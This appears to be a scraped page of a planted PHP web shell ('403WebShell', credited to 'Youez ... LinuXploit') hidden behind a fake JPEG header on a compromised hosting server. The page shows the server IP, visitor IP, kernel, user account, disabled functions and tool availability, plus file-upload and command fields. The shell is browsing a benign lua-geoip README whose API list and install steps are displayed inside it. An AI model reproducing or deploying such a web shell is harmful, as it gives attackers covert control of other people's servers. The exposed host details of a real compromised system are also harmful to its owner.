���� JFIF    aewtgwgerwasdasd403WebShell
403Webshell
Server IP : 147.93.80.58  /  Your IP : 216.73.216.195
Web Server : LiteSpeed
System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
User : u939086737 ( 939086737)
PHP Version : 8.2.28
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/lib/luarocks/rocks-5.4/lua-geoip/0.2-1/doc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/luarocks/rocks-5.4/lua-geoip/0.2-1/doc/README.md
lua-geoip — bindings for MaxMind GeoIP library
==============================================

See the copyright information in the file named `COPYRIGHT`.

## API

* `require 'geoip'`

### Enums

#### DB types

* `geoip.COUNTRY`
* `geoip.COUNTRY_V6`
* `geoip.REGION_REV0`
* `geoip.REGION_REV1`
* `geoip.REGION` = `geoip.REGION_REV1`
* `geoip.CITY_REV0`
* `geoip.CITY_REV1`
* `geoip.CITY` = `geoip.CITY_REV1`
* `geoip.ORG`
* `geoip.ISP`
* `geoip.PROXY`
* `geoip.ASNUM`
* `geoip.NETSPEED`
* `geoip.DOMAIN`

#### Open flags

* `geoip.STANDARD`
* `geoip.MEMORY_CACHE`
* `geoip.CHECK_CACHE`
* `geoip.INDEX_CACHE`
* `geoip.MMAP_CACHE`

#### Charsets

* `geoip.ISO_8859_1`
* `geoip.UTF8`

TODO: Document further. Meanwhile, see tests.

## Where to get stuff?

### On Debian / Ubuntu Using PPA:

MaxMind provides a PPA for recent version of Ubuntu. To add the PPA to your
APT sources, run:

    $ sudo add-apt-repository ppa:maxmind/ppa
    $ sudo apt-get update

Then install the packages by running:

    $ sudo apt-get install geoip-database # GeoLite Country only
    $ sudo apt-get install libgeoip-dev

### Raw

    $ wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz
    $ wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz

### C library

    http://www.maxmind.com/app/c

Youez - 2016 - github.com/yon3zu
LinuXploit